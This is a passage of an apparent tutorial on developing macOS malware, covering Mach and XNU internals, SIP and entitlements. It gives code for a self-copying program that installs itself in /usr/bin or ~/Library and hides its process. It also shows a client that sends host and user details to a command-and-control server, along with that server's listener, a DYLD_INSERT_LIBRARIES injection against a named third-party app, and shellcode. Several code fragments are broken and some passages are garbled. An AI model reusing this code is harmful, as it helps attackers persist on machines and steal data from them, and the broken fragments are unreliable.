In this article, we’ll delve into the world of designing and developing malware for macOS, which is essentially a Unix-based operating system. We’ll take a classic approach to exploring Apple’s internals. All you need is a basic understanding of exploitation, along with knowledge of C and Python programming, as well as some familiarity with low-level assembly language to grasp the details here. While the topics discussed may be advanced, I’ll do my best to present them smoothly.

Let’s start by understanding the macOS architecture and its security features. We’ll then look at the internals, covering key elements like the Mach API and kernel, and walk through some basic system calls with examples that are easy to understand. Next, we’ll introduce a dummy malware. Later on, we’ll explore code injection techniques and how they’re used in malware, and we’ll also touch on persistence methods. To conclude, we’ll demonstrate a basic implementation of shellcode injection. Throughout, we’ll provide a detailed, step-by-step breakdown of the code and techniques involved.


A little background from the internet: the Mac OS X kernel (XNU) is an operating system kernel with a unique lineage, merging the research-oriented Mach microkernel with the more traditional and contemporary FreeBSD monolithic kernel. The Mach microkernel combines a potent abstraction, Mach message-based interprocess communication (IPC), with several cooperating servers to constitute the core of an operating system. It manages separate tasks, each within its own address space and comprising multiple threads, and it also features default servers that offer services like virtual memory paging and system clock management.

However, the Mach microkernel alone lacks crucial functionalities such as user management, file systems, and networking. To address this, the Mac OS X kernel incorporates a graft of the FreeBSD kernel, specifically its top-half (system call handlers, file systems, networking, etc.), ported to run atop the Mach microkernel. To mitigate performance concerns related to excessive IPC messaging between kernel components, both kernels reside in the same privileged address space. Nevertheless, the Mach API accessible from kernel code remains consistent with the Mach API available to user processes.

Before delving into macOS development, it’s crucial to grasp the fundamentals of the operating system. In this discussion, we’ll primarily focus on understanding the security protections, particularly System Integrity Protection (SIP).

SIP serves as a vital security feature designed to safeguard critical system files, directories, and processes from unauthorized modification or tampering by applications. It imposes restrictions on write access to protected system locations, even for processes with root privileges, thus preventing unauthorized alterations. Moreover, SIP implements additional security measures for system extensions and kernel drivers. For instance, kernel extensions are required to be signed by Apple or by developers using a valid Developer ID. This stringent requirement ensures that only trusted extensions are permitted to load into the kernel, bolstering the overall security of the system.

As we can see, SIP (System Integrity Protection) is turned on, indicating that the system is benefiting from its security features. The presence of the “restricted” flag on certain directories highlights SIP’s protection of those specific areas. It’s important to note that SIP’s shielding may not extend to subdirectories within a SIP-protected directory.
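The “restricted” flag mentioned above is an ordinary BSD file flag, so it can be read with a plain stat call. Here is a minimal sketch, assuming a macOS build where <sys/stat.h> defines SF_RESTRICTED; the helper name is_sip_restricted is hypothetical, and on platforms without the flag it simply reports “unknown”.

```c
#include <sys/stat.h>

/* Hypothetical helper: returns 1 if `path` carries the SIP "restricted"
 * file flag, 0 if it does not, and -1 if the path cannot be inspected or
 * the platform does not define SF_RESTRICTED (i.e. it is not macOS). */
int is_sip_restricted(const char *path) {
#ifdef SF_RESTRICTED
    struct stat st;
    /* lstat() so that a symbolic link is inspected itself, not its target */
    if (lstat(path, &st) != 0) {
        return -1;
    }
    return (st.st_flags & SF_RESTRICTED) ? 1 : 0;
#else
    (void)path; /* flag not available on this platform */
    return -1;
#endif
}
```

On a default macOS installation, calling is_sip_restricted("/System") should report the flag as set; it is the same flag that ls -lO prints as “restricted”.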

To keep certain locations writable, firmlinks come into play. Introduced in macOS 10.15 (Catalina), when the system was split into a read-only system volume and a writable data volume, a firmlink is a bidirectional link that maps a directory on the system volume to its counterpart on the data volume. Firmlinks operate transparently, so applications and scripts see a single directory tree and need no special handling. Unlike symbolic links, they are defined by the system rather than created by users.

Firmlinks let macOS keep the system volume protected while still accommodating applications and scripts that expect writable paths in familiar places. For instance, /usr/local is firmlinked to the data volume, which keeps it writable and provides flexibility for installing and managing software and scripts in that directory.

Now, onto entitlements. Entitlements are permissions granted to applications on macOS, dictating their level of access and capabilities within the system. They control the application’s ability to interact with various system resources, including the network, file system, hardware, and user privacy-related information. By granting specific entitlements, macOS ensures that applications have the necessary permissions to perform their intended tasks while maintaining system integrity and protecting user privacy.

Entitlements are expressed as a property list of key-value pairs, but they are not stored in the application’s Info.plist. They are embedded in the application’s code signature at signing time (typically from a separate .entitlements file), which is why codesign is the tool used to inspect them. The Info.plist file, located within the .app bundle, contains metadata and configuration details about the application. Each entitlement is represented by a key, denoting the specific permission or access level, and a value that defines its corresponding setting.

  • For example, an entitlement entry may appear as follows:

In this case, the entitlement with the key “” indicates that the application has permission to act as a network client, granting it access to network resources.

  • We can obtain entitlements of an application by using the following command:
codesign --display --entitlements - /path/to/

The specific entitlements and their corresponding keys and values can vary based on the application’s requirements and the resources it needs to access. By defining entitlements, macOS ensures that applications operate within predefined boundaries, promoting security, privacy, and controlled access to system resources.

Now, let’s talk about Property List (plist) files. Property lists are a file format used on macOS to store structured data, such as configuration settings, preferences, and metadata. They have a hierarchical structure with key-value pairs and support various data types. Property list files can be in XML or binary format.

In the context of macOS, property list files are commonly used for storing application metadata, entitlements, sandboxing settings, and code signing details. For example:

  • Entitlements: An entitlements property list, embedded in the application’s code signature, grants permissions to the application, specifying its access to system resources.
  • Sandbox: Property list files define sandbox settings that restrict an application’s access to resources, enhancing security and protecting user privacy.
  • Code Signing: Property list files store information related to code signing, verifying the authenticity and integrity of an application.

Property List (plist) files can hold various data types and have a hierarchical structure. Here are some commonly used data types and an example of the plist file structure:

  1. Data Types:
    • String: A sequence of characters.
    • Number: Represents numeric values, including integers and floating-point numbers.
    • Boolean: Represents true or false values.
    • Date: Represents a specific date and time.
    • Array: An ordered collection of values.
    • Dictionary: A collection of key-value pairs, where each key is unique.

Here’s an example of a plist file structure:

<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0">

In this example, the property list file contains a dictionary with several entitlement keys related to sandboxing. Each key represents a specific entitlement, and the value <true/> indicates that the corresponding entitlement is enabled.

The three entitlements mentioned in this example are:

  • Enables sandboxing for the application.
  • Allows read-only access to user-selected files.
  • Grants the application permission to act as a network client.

This simplified example demonstrates how property list files can store entitlements related to sandboxing, providing a structured format for specifying the application’s access and permissions within the sandbox environment.

  • We can use plutil to print Info.plist in different formats:
plutil -convert xml1 /Applications/ -o - 
plutil -convert json /Applications/ -o - 

Overall, property list files play a crucial role in macOS by providing a structured and standardized format to store important information related to entitlements, sandboxing, code signing, and more. They enable applications and system components to access and manage this data efficiently, contributing to the security and integrity of the macOS ecosystem.

That’s all we need to know for now. There’s more to explore, such as Sandboxing, App Bundles, and so on, but these are the most important security mechanisms that matter to us for development. Now let’s delve a bit deeper and discuss internal architecture. Why focus on internals? Well, even though I’m not planning to develop a rootkit or anything as advanced, it’s crucial to understand the OS as thoroughly as possible from a developer’s perspective. After all, we’re writing software.

Let’s take a quick look at Mach. Initially designed as a communication-centric operating system kernel with robust multiprocessing support, Mach aimed to lay the groundwork for various operating systems. It favored a microkernel architecture, aiming to keep essential OS services like file systems, I/O, memory management, networking, and different OS personalities separate from the kernel.

XNU, whimsically named “X is not UNIX,” serves as the kernel for Mac OS X. Positioned at the core, Darwin and the rest of the OS X software stack rely on the XNU kernel.

XNU stands out as a hybrid kernel, blending a hardware/IO tasking interface from the minimalist Mach microkernel with elements from the FreeBSD kernel and its POSIX-compliant API. Understanding how programs map to processes in virtual memory on OS X can be a bit tricky due to overlapping definitions. For example, the term “thread” could refer to either the POSIX API pthreads from BSD or the fundamental unit of execution within a Mach task. Moreover, there are two distinct sets of syscalls, each mapped to negative (Mach traps) or positive (BSD) numbers.
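On x86_64 macOS, the two syscall families are additionally told apart by a class value stored in the upper bits of the number passed to the kernel. The sketch below mirrors the class constants from XNU’s osfmk/mach/i386/syscall_sw.h as I understand them; the helper function names are hypothetical, and the constants should be checked against the XNU sources for the version you are studying.

```c
#include <stdint.h>

/* Class values and shift, mirroring osfmk/mach/i386/syscall_sw.h in XNU
 * (assumed here; verify against the XNU sources you are reading). */
#define SYSCALL_CLASS_SHIFT 24
#define SYSCALL_CLASS_MASK  (0xFFu << SYSCALL_CLASS_SHIFT)
#define SYSCALL_NUMBER_MASK (~SYSCALL_CLASS_MASK)
#define SYSCALL_CLASS_MACH  1u /* Mach traps */
#define SYSCALL_CLASS_UNIX  2u /* BSD (POSIX) system calls */

/* Combine a class and a per-class number into the encoded value. */
uint32_t make_syscall(uint32_t cls, uint32_t number) {
    return (cls << SYSCALL_CLASS_SHIFT) | (number & SYSCALL_NUMBER_MASK);
}

/* Extract the class from an encoded value. */
uint32_t syscall_class(uint32_t encoded) {
    return (encoded & SYSCALL_CLASS_MASK) >> SYSCALL_CLASS_SHIFT;
}

/* Extract the per-class number from an encoded value. */
uint32_t syscall_number(uint32_t encoded) {
    return encoded & SYSCALL_NUMBER_MASK;
}
```

For example, make_syscall(SYSCALL_CLASS_UNIX, 4) yields 0x2000004, the value commonly seen for write in x86_64 macOS assembly listings.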

Mach provides a virtual machine interface, abstracting system hardware—a common feature in many operating systems. Its core kernel is designed to be simple and extensible, boasting an Inter-Process Communication (IPC) mechanism that underpins many kernel services. Notably, Mach seamlessly integrates IPC capabilities with its virtual memory subsystem, leading to optimizations and simplifications across the OS.

On OS X, we deal with “tasks” rather than processes. Tasks, similar to processes, serve as OS-level abstractions containing all the resources needed to execute a program. Technically, Mach refers to its processes as tasks, although the concept of a BSD-style process that encapsulates a Mach task persists. Resources within a task include:

  • A virtual address space
  • Inter-process communication (IPC) port rights
  • One or more threads

“Ports” serve as an inter-task communication mechanism, using structured messages to transmit information between tasks. Operating solely in kernel space, ports act like P.O. Boxes, albeit with restrictions on message senders. Ports are identified by Task-specific 32-bit numbers.

Threads are units of execution scheduled by the kernel. OS X supports two thread types (Mach and pthread), depending on whether the code originates from user or kernel mode. Mach threads reside at the OS’s lowest level in kernel-mode, while pthreads from the BSD realm execute programs in user-mode. (More on this later.)

Mach redefines the traditional Unix notion of a process into two components: a task and a thread. In the kernel, a BSD process aligns with a Mach task. A task serves as a framework for executing threads, encapsulating resources and defining a program’s protection boundary. Mach ports, versatile abstractions, facilitate IPC mechanisms and resource operations.

IPC messages in Mach are exchanged between threads for communication, carrying actual data or pointers to out-of-line data. Message transfer is asynchronous, with port capabilities exchanged through messages.

Mach’s virtual memory system encompasses machine-independent components like address maps and memory objects, alongside machine-dependent elements like the physical map. Memory objects serve as containers for data mapped into a task’s address space, managed by various pagers handling distinct memory types. Exception ports, assigned to each task and thread, facilitate exception handling, allowing multiple handlers to suspend affected threads, process exceptions, and resume or terminate threads accordingly.

Let’s explore the basics of Mach System Calls, including retrieving system information and performing code injection. This will provide a fundamental understanding of interacting with macOS. By the way, a system call is a kernel function invoked from user space. It can involve tasks like writing to a file descriptor or exiting a program. Typically, these system calls are wrapped by C functions in the standard library.

Baby Steps

If we head over to the Mach IPC Interface or Apple documentation we can find a Mach system call that’s pretty handy for getting basic info about the host system. It tells us stuff like how many CPUs there are, both maximum and available, the physical and logical CPUs, memory size, and the max memory size. This call is host_info(), and it’s super useful for getting details about a host, like what kind of processors are installed, how many are currently available, and the total memory size.

Now, like a lot of Mach “info” calls, host_info() needs a flavor argument to specify what kind of info you want. For instance:

kern_return_t host_info(host_t host, host_flavor_t flavor,
                        host_info_t host_info,
                        mach_msg_type_number_t *host_info_count);
  • HOST_BASIC_INFO: Returns basic system information.
  • HOST_SCHED_INFO: Provides scheduler-related data.
  • HOST_PRIORITY_INFO: Offers scheduler-priority-related information.

Besides host_info(), other calls like host_kernel_version(), host_get_boot_info(), and host_page_size() can be employed to access miscellaneous system details.

#include <stdio.h>
#include <stdlib.h>
#include <mach/mach.h>
#include <mach/mach_error.h>

/* Assumed helper (its definition is not shown in the original listing):
   report the Mach error and exit if a call did not succeed */
#define EXIT_ON_MACH_ERROR(msg, retval) \
    if ((retval) != KERN_SUCCESS) { mach_error(msg ":", (retval)); exit(EXIT_FAILURE); }

int main() {
    kern_return_t kr; /* the standard return type for Mach calls */
    mach_port_t myhost;
    kernel_version_t kversion; /* the buffer type host_kernel_version() expects */
    host_basic_info_data_t hinfo;
    mach_msg_type_number_t count;
    vm_size_t page_size;

    // Retrieve System Information
    printf("Retrieving System Information...\n");

    // Get send rights to the name port for the current host
    myhost = mach_host_self();

    // Get kernel version
    kr = host_kernel_version(myhost, kversion);
    EXIT_ON_MACH_ERROR("host_kernel_version", kr);

    // Get basic host information
    count = HOST_BASIC_INFO_COUNT; // size of the buffer
    kr = host_info(myhost, HOST_BASIC_INFO, (host_info_t)&hinfo, &count);
    EXIT_ON_MACH_ERROR("host_info", kr);

    // Get page size
    kr = host_page_size(myhost, &page_size);
    EXIT_ON_MACH_ERROR("host_page_size", kr);

    printf("Kernel Version: %s\n", kversion);
    printf("Maximum CPUs: %d\n", hinfo.max_cpus);
    printf("Available CPUs: %d\n", hinfo.avail_cpus);
    printf("Physical CPUs: %d\n", hinfo.physical_cpu);
    printf("Maximum Physical CPUs: %d\n", hinfo.physical_cpu_max);
    printf("Logical CPUs: %d\n", hinfo.logical_cpu);
    printf("Maximum Logical CPUs: %d\n", hinfo.logical_cpu_max);
    printf("Memory Size: %llu MB\n", (unsigned long long)(hinfo.memory_size >> 20));
    printf("Maximum Memory: %llu MB\n", (unsigned long long)(hinfo.max_mem >> 20));
    printf("Page Size: %u bytes\n", (unsigned int)page_size);

    // Clean up and exit
    mach_port_deallocate(mach_task_self(), myhost);
    return 0;
}

So, basically, the code is pretty easy to understand. It just grabs system information and shows things like the kernel version, right? It’s simple and harmless. But if we want to learn more about system calls, we need something different. How about something that acts more like malware? But let’s keep it simple at first. We can start by writing code that writes a copy of itself to either /usr/bin/ or ~/Library/.

To achieve this kind of behavior, we need to use task operations because we need to control another process and access system processes. I found specific Mach calls like pid_for_task(), task_for_pid(), and task_name_for_pid(), which convert between Mach task ports and Unix PIDs, alongside mach_task_self(), which returns the calling task’s own port. However, the conversion calls essentially bypass the capability model, so they are restricted on macOS by UID checks, entitlements, SIP, and so on. They are not documented as part of a public API and are privileged, typically accessible only to processes with elevated privileges like root or members of the procview group. This limitation poses a challenge because malware would need elevated privileges, or execution on a privileged account, to use them.

Thus, we can’t use task_for_pid on Apple platform binaries due to SIP. However, if permitted, we would have the port and could essentially do anything we want, including what I’m about to explain. So for this example we’ll use mach_task_self(), as it does not require privileges. It returns a send right to the current task’s own port.

int main(int argc, char *argv[]) {
  kern_return_t kr;
  task_t target_task;
  geteuid() != 0;
  kr = mach_task_self();

  struct stat st;
  if (stat("/usr/bin/", &st) == 0 && S_ISDIR(st.st_mode) &&
      access("/usr/bin/", W_OK) == 0) {
    // Write to /usr/bin/
    char buffer[BUF_SIZE];
    ssize_t bytes_read;
    int src_fd = open(argv[0], O_RDONLY);
    int dest_fd = open("/usr/bin/" MALWARE_NAME, O_WRONLY | O_CREAT | O_TRUNC,
                       S_IRUSR | S_IWUSR);
    while ((bytes_read = read(src_fd, buffer, sizeof(buffer))) > 0) {
      write(dest_fd, buffer, bytes_read);
  } else {
    // Fallback
    char home_malware_path[256];
    snprintf(home_malware_path, sizeof(home_malware_path), "%s/Library/%s",
             getenv("HOME"), MALWARE_NAME);
    char buffer[BUF_SIZE];
    ssize_t bytes_read;
    int src_fd = open(argv[0], O_RDONLY);
    int dest_fd = open(home_malware_path, O_WRONLY | O_CREAT | O_TRUNC,
                       S_IRUSR | S_IWUSR);
    while ((bytes_read = read(src_fd, buffer, sizeof(buffer))) > 0) {
      write(dest_fd, buffer, bytes_read);

  mach_port_deallocate(mach_task_self(), target_task);

If you take a look at the main function, you’ll see how we obtain the task port for the current process using mach_task_self(). More precisely, we obtain a send right to a task port, which is basically just a send right to a Mach port for which the kernel owns the receive right. What makes a task port special is that when the kernel receives a message sent to a task port, rather than enqueueing the message, the kernel will perform an action on the corresponding task. This means that userspace processes can send messages to a task port in order to inspect or control the task. The program then checks whether it has write access to /usr/bin/. If it cannot write to /usr/bin/, it copies itself to ~/Library/ (under the user’s home directory) with a defined name.

As for the hide_process() function, it hides the child process from user interaction and prevents it from receiving signals from the terminal. It works by creating a child process using fork() (remember the BSD part), exiting the parent process, and then detaching the child process from the controlling terminal using setsid().

This simply demonstrates a basic technique used by malware to hide itself on a system by copying itself to a system directory (/usr/bin/) or the user’s home directory (~/Library/) and then attempting to hide its process from detection.

This is far from being malicious code, but it does provide us with valuable insights into working with the Mach API and conducting low-level system operations. Through this example, we’ve gained familiarity with essential concepts such as process management and communication.

0x100003e79 <+505>: callq  0x100003c50               ; hide_process
0x100003e7e <+510>: movq   0x17b(%rip), %rax         ; (void *)0x0000000000000000
0x100003e85 <+517>: movl   (%rax), %edi
0x100003e87 <+519>: movl   -0x18(%rbp), %esi
0x100003e8a <+522>: callq  0x100003ec6               ; symbol stub for: mach_port_deallocate
0x100003e8f <+527>: xorl   %edi, %edi
0x100003e91 <+529>: movl   %eax, -0x21ec(%rbp)
0x100003e97 <+535>: callq  0x100003eb4               ; symbol stub for: exit

Here we put our little program into a debugger. As you can see in the disassembly, there are instructions that correspond to our operations, such as the /usr/bin/ check. You can also see the cleanup operations being performed, such as deallocating the port and exiting the program.

Let’s say that, after infecting a new host, we want our malware to notify us of its presence by sending information about the host. We opt for a straightforward, “naive” approach. This method might seem amateurish, since malware shouldn’t connect to a Command & Control (C2) server right away. However, since we’re just exploring macOS as new territory, it’s a starting point. We collect system information such as the system name, release version, machine architecture, hardware model, user ID, home directory, and so on, and then send this information to the C2.

For retrieving or modifying information about the system and environment, we can make use of sysctlbyname(). This function enables us to fetch specific system details, such as the hardware model, directly from the system kernel.

    // Get hardware model
    size_t len = BUF_SIZE;
    if (sysctlbyname("hw.model", &model, &len, NULL, 0) == 0) {
        send_data(sockfd, "nHardware Model: ");
        send_data(sockfd, model);
    } else {
        printf("ERROR: Failed to get hardware modeln");

When it comes to System Owner/User Discovery, we typically access user-related data through standard POSIX interfaces like getpwuid(), as discussed before.

void send_system_info(int sockfd) {
    struct utsname sys_info;
    char model[BUF_SIZE];
    char uid_str[BUF_SIZE];
    // Get system information
    if (uname(&sys_info) == 0) {
        send_data(sockfd, "nSystem Name: ");
        send_data(sockfd, sys_info.sysname);
        send_data(sockfd, "nRelease Version: ");
        send_data(sockfd, sys_info.release);
        send_data(sockfd, "nMachine Architecture: ");
        send_data(sockfd, sys_info.machine);
    } else {
        printf("ERROR: Failed to get system informationn");

    // Get user information
    uid_t uid = getuid();
    struct passwd *user_info = getpwuid(uid);
    if (user_info != NULL) {
        send_data(sockfd, "nUser ID: ");
        snprintf(uid_str, BUF_SIZE, "%d", user_info->pw_uid);
        send_data(sockfd, uid_str);
        send_data(sockfd, "nHome directory: ");
        send_data(sockfd, user_info->pw_dir);
        send_data(sockfd, "nLogin shell: ");
        send_data(sockfd, user_info->pw_shell);
        // Get primary group information
        struct group *group_info = getgrgid(user_info->pw_gid);
        if (group_info != NULL) {
            send_data(sockfd, "nPrimary group: ");
            send_data(sockfd, group_info->gr_name);
        } else {
            printf("ERROR: Failed to get primary group informationn");
    } else {
        printf("ERROR: Failed to get user informationn");

Simply providing a snapshot of the system and user environment is crucial for gathering information on potential targets. However, since malware typically only has one chance for infection, it needs to be self-reliant before attempting Phone Home. This is why the approach of using a dummy malware, primarily for testing and exploring options before developing an actual malware, is essential.

Nevertheless, deploying a dummy malware still provides attackers with a significant amount of information that could be leveraged for subsequent targeted attacks or exploiting vulnerabilities, whether in the kernel or userland.

You can rely on LOLBins (Living off the Land Binaries) for gathering host information, such as /usr/sbin/system_profiler -nospawn -detailLevel full. However, the catch is that such commands are visible and can be easily flagged. Despite this, it remains an easy and effective method for malware to extract details from the infected host.

Alright, so how do we transmit the data? Well, we use a socket. This API allows us to send data to the connected endpoint, which in this case is the Command & Control server. Data is sent in the form of strings. To ensure that the data is properly formatted and transmitted over the socket to the C2 server, we rely on functions like send() for sending data and file I/O functions such as popen() and fgets() for reliable reading and sending of data. It’s pretty simple.

The C2 server is also really simple: it is up for the sole purpose of handling incoming connections, and it has no protection mechanism to hide itself on the system it is running on. This server is basic and for demonstration only. I recommend having encryption and a database in place to organize the data, as well as generating a temporary ID to associate with each instance.

The extraction module (ext) starts an autonomous thread that listens for incoming connections from malware instances. Once connected, the module simply prints to standard output the content of the incoming connection (which is the information extracted by the client).

// The server will keep listening for incoming connections indefinitely
while (1) {
    // Accept a new connection from a client
    cltlen = sizeof(cltaddr);
    cltfd = accept(dexft_fd, (struct sockaddr *) &cltaddr, &cltlen);

    // Check if the accept call was successful
    if (cltfd < 0) {
        // If accept failed, print an error message and continue listening
        printf("Failed to accept incoming connection, %dn", cltfd);

    // Print out information about the connected client
    printf("Collecting data from client %s:%d...n", inet_ntoa(cltaddr.sin_addr), ntohs(cltaddr.sin_port));

    // Receive data from the client and process it
    while ((br = recv(cltfd, buf, BUF_SIZE, 0)) > 0) {
        // Write the received data to the standard output
        fwrite(buf, 1, br, stdout);

    // Check if an error occurred during data reception
    if (br < 0) {
        printf("ERROR: Failed to receive data from client!n");

    // Close the client socket

return NULL;

As you can see, the code itself is quite simple yet functional. Once the client is executed, the server collects data from the connected clients, and then closes the connection before resuming listening for new connections.

Collecting data from client

System Name: Darwin
Release Version: 19.6.0
Machine Architecture: x86_64
Hardware Model: ....

User ID: 5..
Home directory: /Users/foo
Login shell: /bin/zsh

Obviously, this will get flagged in a second. Why, you may ask? Well, the behavior exhibited here screams malware, from establishing a connection to sending system information and continuously receiving and executing commands from a remote server. The network traffic pattern alone is a red flag, and so is the transmission of system information immediately after connection establishment. However, this explanation provides a simple overview of how dummy malware can be used as a learning piece of code before developing actual malware. Next, we’ll delve into a topic that I find quite interesting. Yes, you guessed it: code injection.

Actually, exploring Code Injection deserves its own article, and I’ll include some resources at the end. However, for now, let’s focus on two techniques that I find quite effective. So, let’s begin by introducing the first technique, which involves leveraging environment variables, specifically DYLD_INSERT_LIBRARIES, for code injection.

DYLD_INSERT_LIBRARIES is a powerful feature that allows users to preload dynamic libraries into applications. Both developers and attackers can use it to inject code into a process at launch without modifying the original executable file, and it is commonly used to intercept function calls, manipulate program behavior, or even introduce malicious functionality into a legitimate application, as we’re going to see. It’s basically a colon-separated list of dynamic libraries to load before the ones specified in the program. This lets you test new modules of existing dynamic shared libraries that are used in flat-namespace images by loading a temporary dynamic shared library with just the new modules.

In simple terms, it will load any dylibs you specify in this variable before the program loads, essentially injecting a dylib into the application. So, for example:

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

void foo() {
  printf("Dynamic library injected! n");
  system("/bin/bash -c 'echo Library injected!'");

As you can see, we have a function foo() that prints a message to let us know that we successfully injected a library, plus a system() call that runs a shell to echo basically the same thing. The __attribute__((constructor)) attribute marks the function to run before the main function of the application into which we injected the dylib. Piece of cake, right? But how do we identify binaries vulnerable to environment variable injection? More on that later. First, let’s just try it on one of our previous programs: compile that code like any other program and run it.

~ > gcc -dynamiclib inject.c -o inject.dylib

~ > DYLD_INSERT_LIBRARIES=inject.dylib ./foo
Dynamic library injected!
Library injected!

Et voilà, it’s affected. So what happens is that it loads any dylibs specified in this variable before the program loads, essentially injecting a dylib into the application. Which means privilege escalation, right? Not so fast: this does not work against Apple platform binaries. As of macOS 10.14, third-party developers can also opt in to a hardened runtime for their application, which can prevent the injection of dylibs using this technique. So basically we can still perform injection when the application does not have the Hardened Runtime enabled and therefore allows the injection of dylibs using the environment variable, or when the binary uses the hardened runtime but the developer released it with the appropriate entitlements:

  • The “Disable-library-validation” entitlement allows any dylib to run on the binary even without checking who signed the file and the library. This permission usually exists in programs that allow community-written plugins.
  • The entitlement loosens the hardened runtime restrictions and allows the use of DYLD_INSERT_LIBRARIES to inject a library.
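When auditing your own builds, whether a binary opted in to the hardened runtime can be read from its code-signing flags. Here is a minimal sketch, assuming the CS_RUNTIME value (0x10000) from XNU’s cs_blobs.h and a flags=0x... field of the kind printed by codesign -dv; both function names are hypothetical.

```c
#include <stdlib.h>
#include <string.h>

/* Hardened runtime bit in the code-signing flags, per XNU's cs_blobs.h
 * (assumed here; verify against the headers for your SDK). */
#define CS_RUNTIME 0x00010000UL

/* Hypothetical helper: find "flags=" in one line of `codesign -dv` output
 * and parse the hexadecimal value that follows it.
 * Returns 0 and stores the value in *out on success, -1 otherwise. */
int parse_cs_flags(const char *line, unsigned long *out) {
    const char *p = strstr(line, "flags=");
    if (p == NULL) {
        return -1;
    }
    p += strlen("flags=");
    char *end = NULL;
    unsigned long value = strtoul(p, &end, 16); /* accepts a leading 0x */
    if (end == p) {
        return -1; /* no digits after "flags=" */
    }
    *out = value;
    return 0;
}

/* Returns 1 if the hardened runtime bit is set in `flags`, 0 otherwise. */
int has_hardened_runtime(unsigned long flags) {
    return (flags & CS_RUNTIME) != 0;
}
```

Parsing the numeric value instead of matching the word “runtime” keeps the check independent of how the flag names are spelled in the tool’s output.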

Alright on possible target application, For example to run this on It won’t work, because is hardened and lacks the matching entitlement,

but that doesn’t mean that the application is not hardened, as there are other Hardened Runtime features that may not be reflected in the entitlements, So I speed up the process and I found that Veracrypt is not using Hardened Runtime, So I’m going to use it as an example for the whole article, sorry

So, let’s try to inject it, but first


static void customConstructor(int argc, const char **argv)
syslog(LOG_ERR, "Dylib injection successful in %sn", argv[0]);

So, We just print foo and logs a message using the syslog() function, that logs an error message indicating successful injection of a dynamic library (dylib) along with the name of the program, So let’s try it, And it seems that we’ve successfully loaded the library when we see the following output:

If we attempt to use DYLD_INSERT_LIBRARIES in another binary that is hardened and lacks the matching entitlement, we won’t be able to load the library, and consequently, we won’t see the desired output.

However, some internal components of macOS expect threads to be created using the BSD APIs and have all Mach thread structures and pthread structures set up properly. This can present challenges, especially with changes introduced in macOS 10.14.

I came across a piece of code inject.c that addresses this issue. Additionally, I highly recommend reading the “Mac Hacker’s Handbook” as it provides invaluable insights and includes some great examples of interprocess code injection.

Based on what I’ve understood, the transition from Mach thread APIs to pthread APIs in macOS, particularly concerning the initialization of thread structures, presents challenges. However, the discovery of the _pthread_create_from_mach_thread function provides a viable alternative for initializing pthread structures from bare Mach threads. This ensures compatibility and proper functioning of threaded applications across different macOS versions.

For those interested, I’ve included examples demonstrating how to inject code to call dlopen and load a dylib into a remote mach task: Gist 1 & Gist 2

Alright, let’s discuss the second technique. It’s similar to methods used on Windows: process injection, the ability of one process to execute code in a different process. On Windows, one reason to do this is to evade detection by antivirus software, for example through a technique known as DLL hijacking, which lets malicious code pretend to be part of a different executable. On macOS, this technique can have significantly more impact because of the difference in permissions two applications can have.

In the classic Unix security model, each process runs as a specific user. Each file has an owner, group and flags that determine which users are allowed to read, write or execute that file. Two processes running as the same user have the same permissions: it is assumed there is no security boundary between them. Users are security boundaries, processes are not. If two processes are running as the same user, then one process could attach to the other as a debugger, allowing it to read or write the memory and registers of that other process. The root user is an exception, as it has access to all files and processes. Thus, root can always access all data on the computer, whether on disk or in RAM.
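As a rough illustration of that model, here is a minimal sketch of the classic read check: owner bits first, then group bits, then "other" bits, with root bypassing all of them. The function name `may_read` and the sample user and group IDs are made up for the example, and the sketch ignores ACLs and everything macOS layers on top.

```python
import stat


def may_read(uid, gids, file_uid, file_gid, mode):
    """Classic Unix read check for a process with the given uid and group set."""
    if uid == 0:
        return True  # root is the exception: it bypasses the permission bits
    if uid == file_uid:
        return bool(mode & stat.S_IRUSR)  # owner bits apply
    if file_gid in gids:
        return bool(mode & stat.S_IRGRP)  # group bits apply
    return bool(mode & stat.S_IROTH)      # everyone else


if __name__ == "__main__":
    mode = 0o100640  # regular file, rw for owner, r for group
    print(stat.filemode(mode))
    print(may_read(501, {20}, 501, 20, mode))   # the owner
    print(may_read(502, {30}, 501, 20, mode))   # unrelated user
```

Note that the check only looks at user and group identity. Nothing in it distinguishes one process from another when both run as the same user, which is exactly the "users are security boundaries, processes are not" point.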

This was, in essence, also the security model of macOS until the introduction of SIP. Since then, for example, certain files can no longer be read by the root user unless the process also has specific entitlements. The Unix ownership rules are still present; this is an additional layer of permission checks on top of them.

OS X Shellcode Injection

So, we’re going to write a simple shellcode injection program where the malware’s host process injects shellcode into the memory of a remote process. Let’s give it a shot, but first, let’s write a simple shellcode for testing purposes.

Writing 64-bit assembly on macOS differs somewhat from doing so for ELF targets: you need to be aware of the macOS executable file format, Mach-O. I’ll stick to the x86_64 architecture, and later we’ll use the linker to produce a Mach-O executable. Take a simple Hello World program. As you know, we start by declaring two sections: .data and .text. The .data section stores initialized data, while the .text section contains executable code. The _main function is the entry point of the program. It jumps to a reference point in the code, trick, where a call invokes the continue subroutine. The call leaves the address of the string ‘Hello World!’ on the stack as its return address, and continue pops it into rsi. Notice also that there are two system calls: the first writes the data, and the one at the end exits the program.

section .data
section .text

global _main

_main:
	jmp trick

continue:
	pop rsi            ; Pop string address into rsi
	mov rax, 0x2000004 ; System call write = 4
	mov rdi, 1         ; Write to standard out = 1
	mov rdx, 14        ; The size to write
	syscall            ; Invoke the kernel
	mov rax, 0x2000001 ; System call number for exit = 1
	mov rdi, 0         ; Exit success = 0
	syscall            ; Invoke the kernel
trick:
	call continue
	db "Hello World!", 0, 0
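The constants 0x2000004 and 0x2000001 may look odd next to the comments that say "write = 4" and "exit = 1". On 64-bit macOS the syscall number carries a class in its upper bits, and BSD (Unix) calls use class 2 shifted left by 24. A small sketch of that arithmetic follows; the helper name `bsd_syscall` is made up for illustration, while the class and shift values mirror the ones in XNU's headers.

```python
SYSCALL_CLASS_SHIFT = 24  # the class lives above the low 24 bits
SYSCALL_CLASS_UNIX = 2    # BSD system calls


def bsd_syscall(number):
    """Combine the Unix class with a BSD syscall number."""
    return (SYSCALL_CLASS_UNIX << SYSCALL_CLASS_SHIFT) | number


if __name__ == "__main__":
    print(hex(bsd_syscall(4)))  # write
    print(hex(bsd_syscall(1)))  # exit
```

Setting bit 25 of a register that already holds the plain number gives the same result, since 1 << 25 equals 0x2000000.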

Alright, time to compile. I use NASM for assembling my code. Remember what I said about using the linker to create Mach-O executables? Well, after assembling the code with NASM, we need to link it using ld. This linker not only brings together the assembled code but also incorporates necessary system libraries.

